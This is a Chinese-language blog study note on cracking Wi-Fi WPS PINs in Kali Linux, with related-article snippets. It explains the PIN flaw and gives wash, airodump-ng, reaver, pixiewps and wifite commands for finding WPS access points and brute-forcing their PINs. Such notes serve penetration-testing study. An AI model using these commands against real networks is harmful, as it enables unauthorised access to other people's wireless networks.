Kali Linux学习笔记—无线网络 WPS 攻击

最新推荐文章于 2024-05-05 19:18:03 发布

江河湖海：D

最新推荐文章于 2024-05-05 19:18:03 发布

阅读量1.6k

点赞数 1

分类专栏：渗透测试文章标签： kali linux

本文链接：https://blog.csdn.net/weixin_43653897/article/details/110498389

版权

渗透测试专栏收录该内容

14 篇文章

订阅专栏

WPS是WiFi联盟开发的简化无线接入技术，通过PIN码简化操作。但它存在安全漏洞，可根据路由器返回信息判断前4位PIN码是否正确，后4位仅1000种组合，可穷举破解。还介绍了启动侦听模式、爆破PIN码等破解步骤及相关工具。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

WPS攻击

WPS WIRELESS PROTECTED SETUP
WPS是WiFi联盟开发的一项目的是既保证安全又简化接入的技术。

通过PIN码来简化无线接入的操作，无需记住PSK
路由器和网卡各按一个按钮就能接入无线
PIN码是分为前后各4位的2段共8位数字

安全漏洞

接入方可以根据路由器的返回信息判断前4位是否正确
PIN码后4位只有1000种定义的组合
所以全部穷举破解只需要11000次尝试

步骤：

启动侦听模式，发现支持WPS的AP

wash -F -i wlan0mon 
airodump-ng wlan0mon --wps

-F 忽略错误帧的报警
在这里插入图片描述

Lck 锁定机制，锁定后使用PIN机制也无法破解。

爆破PIN码

reaver -i wlan0mon -b <AP mac> -vv -c 11 -K 1

-c 指定信道
-p 由pixiewps知道PIN码后可得无线密码

pixiewps

pixiewps -e <pke> -r <pkr> -s <E-hash1> -z <E-hash2> -a <Authkey> -n <e-nonce>

综合自动化无线密码破解工具 wifite

wifite
ctrl+c 
输入选中的NUM

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

江河湖海：D

关注关注

1
点赞
踩
14

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

Kali学习 | 无线渗透：7.4 攻击WPS（Wi-Fi Proteced Setup）

qq_43233085的博客

01-28

3263

Kali学习 | 无线渗透：7.4 攻击WPS（Wi-Fi Proteced Setup）WPS 介绍使用Reaver破解WPS使用Wifite攻击WPS WPS 介绍 WPS是由Wi-Fi联盟所推出的全新Wi-Fi安全防护设定标准。该标准主要是为了解决无线网络加密认证设定的步骤过于繁杂的弊病。因为通常用户往往会因为设置步骤太麻烦，以至于不做任何加密安全设定，从而引起许多安全上的问题。所以很...

Kali linux无线网络渗透详解笔记

热门推荐

chenweida1的博客

04-30

1万+

Kali linux无线网络渗透详解笔记第一章：搭建渗透环境测试环境第二章：WiFi网络的构成第三章：监听WiFi网络第四章：捕获数据包第五章分析数据包新的改变功能快捷键合理的创建标题，有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX...

参与评论您还未登录，请先登录后发表或查看评论

kali无线渗透之用wps加密模式可破解wpa模式的密码12_kali wps

ccc6553584的博客

04-13

3239

驱动图标打开Ralink设置界面在该界面单击(新增WPS连线设定)图标在该界面单击(新增WPS连线设定)图标在该界面选择"PBC连线设定方式"复选框，然后单击(下一步)按钮在该界面单击“开始PIN"按钮，将开始连接WiFi网络此时，按路由器上的QSS/RESET按钮按一下路由器上的QSS/RESET按钮后，返回到Ralink连线设定界面。

Kali linux 渗透测试（五）——渗透WPS攻击

Bulldozer_GD的博客

05-22

1273

WPS（wireless protected setup） wifi联盟2006年开发的技术，路由器和网卡各按一个键就能接入无线，PIN码分为前后两段各4位 1、安全漏洞 2011年发现接入发起方可以根据路由器的返回信息判断前四位是否正确后四位穷举，最后一位是校验位，只要1000次尝试 PSK： 218,340,105,584,896总共11000次尝试可以破解PIN码，得到无线密码不过现在很多厂家实现了锁定机制一分钟只能尝试有限次数，但是一般一天左右能够破解 wash -i wlan0mon -c 1

无线网络WPS攻击

游客

04-29

5560

无线网WPS攻击（测试未成功）提前准备：注意：顺序最好不要乱了顺序。 1.service network-manager stop 2. airmon-ng check kill 3.连接外置网卡 4.airmon-ng start wlan0 （把网卡变为监听模式，输入ifconfig可看到wlan0已变成wlan0mon）正式步骤： 1.利用wash扫描附近开启WPS的网络：wash -...

2024年最全kali无线渗透之用wps加密模式可破解wpa模式的密码12_kali wps，网络安全开发究竟该如何学习

最新发布

2401_84558314的博客

05-05

1170

无线网络渗透测试艺术：Kali Linux解锁无线安全

[无线网络渗透测试艺术：Kali Linux解锁无线安全](https://mmbiz.qpic.cn/mmbiz_jpg/hiblEpPKcbfOfRfT97EQ2wn1kIPPVoLtL8Qzz4zWldXT2cmcp0I55n49M2zDb1ccLaicpUP0iaotXq77MGiaibyxUGQ/640?wx_fmt=jpeg) # 1. 无线...

reaver-wps, 针对 Wifi protected 设置的强力攻击.zip

10-10

reaver-wps, 针对 Wifi protected 设置的强力攻击带MAC的 REAVER WPSREAVER WPS修改版本，带有MAC地址上一个字符转换器，以加速攻击。好吧，有些时候AP会在成功的pin尝试后拒绝"eapol请求"。我对同时运行的reaver ( 。-m参数) 实例进行了一些测试

攻击Wordpress应用程序（使用WPSCAN）

csu_vc的博客

07-18

1298

第一步——获取WordPress应用程序怎么获取WordPress的具体操作在这里不仔细叙述，网上百度就有第二部——安装WordPress Turnkey Linux下载好ISO文件之后进行安装WordPress Turnkey Linux的安装这里也不仔细叙述，比较简单第三步——安装完毕并设置好可以看到WordPress应用服务的详细信息，如Web地址、Web shell地址等，如图第四步

WPS 攻击渗透-学习笔记

winux123的博客

11-26

812

1、启用监听模式(Monitor Mode),发现支持WPS的AP 如果进入监听模式请查阅前两章有关WPA WEP攻击的文章 wash -C -i wlan0mon#-C 忽略错误帧 -i 指定网卡 airodup-ng wlan0mon --wps 2、爆破PIN码 reaver -i wlan0mon -b <AP mac> -vv #-vv 显示详细的信息 3、在得...

无线渗透_WPS攻击

分享学习网络的点点滴滴

07-07

588

WPS是WIFI联盟2006年开发的一项技术通过PIN码来简化无线接入的操作，无需记住PSK路由器和网卡各按一个按钮就能接入无线PIN码是分为前后各4位的2段共8位数字安全漏洞PSK：218,340,105,854,8962011年被发现安全涉及漏洞接入发起方可以根据路由器的返回信息判断前4位是否正确而PIN码的后4位只有1000种定义的组合（最后一位是checksum）所以全部穷举破解只需要11000次尝试标准本身没有设计锁定机制，目前多个厂商已实现锁定机制包括Linksys在内的很多厂家的无线路由器无法

kali2018.2破解WPA2加密的WiFi

我的学习笔记

08-21

4935

参考：https://www.youtube.com/watch?v=lXNVk3Z0HlM wpa2的密码破解：前提条件：电脑+主流抓包网卡，kali Linux airmon-ng airmon-ng start wlan0 #这里根据实际的interface填写； airodump-ng wlan0mon 选取一个ENC标识为wpa2的WiFi，记录BSSID； airodu...

kali无线渗透之用wps加密模式可破解wpa模式的密码12_kali wps(1)

2401_84166672的博客

04-09

1163

双击驱动图标。在该界面单击第三个图标（连线设定）。在该界面单击（新增WPS连线设定）图标。在该界面显示了WPS的两种连接方式，这里选择PIN连线设定方式，并且选择连接的AP。设置完后，单击（下一步）按钮。在该界面选择连线设定模式。该驱动默认支持“登录者”或“受理注册机构”两种模式。当使用“登录者”模式时，可以单击“更新8码”按钮来重新产生一组PIN码;如果使用“受理注册机构”时，会要求输入一组PIN码。这里选择“受理注册机构”，从该界面可以看到有一组PIN码。

无线渗透(中)--WPS破解

hl1293348082的专栏

04-07

5651

0x00. 前言基于第一篇文章WPA密码破解的反馈，有人提问说能否写一下关于WPA2的文章。笔者在这里回答一下，破解WPA2的流程和WPA是一样的，WPA2只是采用了更加复杂可靠的加密算法（利用CCMP替代了TKIP，AES替代了RC4），不过依然可以利用上一篇文章中提到的攻击原理来暴力破解PSK，所以笔者不会再写WPA2的内容。另外，由于某些缘故WEP密码破解可能不会写了，大家见谅，不过其他内容依然会陆续推出。 0x01. WPS简介 WPS是由Wi-Fi联盟组织实施的认证项目，主要致力于简化无线

“攻击WPS样本”实为敲诈者

weixin_34183910的博客

09-01

272

一、概述 4月30日，安天接到用户提供的恶意邮件附件，据该用户称已将该附件提交至第三方开放沙箱，并怀疑其专门攻击wps办公系统及窃取信息。由于该样本可能与国产办公软件环境相关，引发了部分用户的关注，希望安天能尽快给予帮助确认，经过安天CERT分析确认，该样本确实是恶意代码，但并对WPS办公环境并无针对性。经安天CERT分析确认该样本为CTB-Locke...